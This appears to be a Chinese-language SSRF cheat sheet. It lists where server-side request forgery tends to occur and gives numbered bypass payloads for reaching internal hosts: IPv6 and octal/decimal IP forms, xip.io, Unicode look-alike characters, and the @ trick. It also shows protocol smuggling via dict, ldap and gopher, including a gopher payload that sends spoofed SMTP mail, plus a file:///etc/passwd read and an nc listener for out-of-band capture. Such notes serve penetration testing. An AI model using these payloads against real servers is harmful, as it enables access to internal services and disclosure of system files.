ssrf
场景
(1)能够对外发起网络请求的地方 (2)请求远程服务器资源的地方 (3)数据库内置功能 (4)邮件系统 (5)文件处理 (6)在线处理工具 在线识图,在线文档翻译,分享,订阅等 根据远程URL上传,静态资源图片等 数据库的比如mongodb的copyDatabase函数 邮件系统就是接收邮件服务器地址 文件处理比如ImageMagick,xml 从URL关键字中寻找,比如:source,share,link,src,imageurl,target等
参考文章
https://twitter.com/AmitMDubey/status/1281920617931923458
Payload - 1
http://127.0.0.1:80 http://localhost:22
Payload-2
利用[::]绕过localhost http://[::]:80/ >>> http://127.0.0.1
Payload-3
http://example.com@127.0.0.1
Payload-4
http://xxx.cn/>>> http://127.0.0.1 (短链接)
Payload-5
http://127.0.0.1.xip.io/
http://www.domain.com.127.0.0.1.xip.io/
Payload-6
"><iframe src="http://victim.com"></iframe> --文件上传处
Payload-7
ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ >>> example.com --Unicode特殊字符
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳
⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
Payload-8
127。0。0。1 >>> 127.0.0.1
Payload-9
115.239.210.26 >>> 16373751032 --进制绕过
http://127.0.0.1 >>> http://0177.0.0.1/
http://127.0.0.1 >>> http://2130706433/
http://192.168.0.1 >>> http://3232235521/
http://192.168.1.1 >>> http://3232235777/
Payload-10
http://0/ --特殊地址
Payload-11
协议绕过
Dict:// dict://<user-auth>@<host>:<port>/d:<word> ssrf.php?url=dict://attacker:11111/ SFTP:// ssrf.php?url=sftp://example.com:11111/ TFTP:// ssrf.php?url=tftp://example.com:12346/TESTUDPPACKET LDAP:// ssrf.php?url=ldap://localhost:11211/%0astats%0aquit Gopher:// ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
原理
服务器: IP:96.XX.191.14 nc -l -p 8081 客户端: http://xx.map.xx.com/maps/services/thumbnails?width=215&height=145&quality=120&align=middle,middle&src=http://96.xx.191.14:8081
FUZZ
http://XX.XX.com/proxy.php?name=1&pwd=11&src_url=file:///etc/passwd
www.xxx.com/a.php?image=http://XX.XX.191.14/1.jpg
www.xxx.com/a.php?image=10.18.11.xx
无回显
collaborator
CVE
FFmpeg
版本 < 3.3.2 CVE-2016-1897 CVE-2016-1898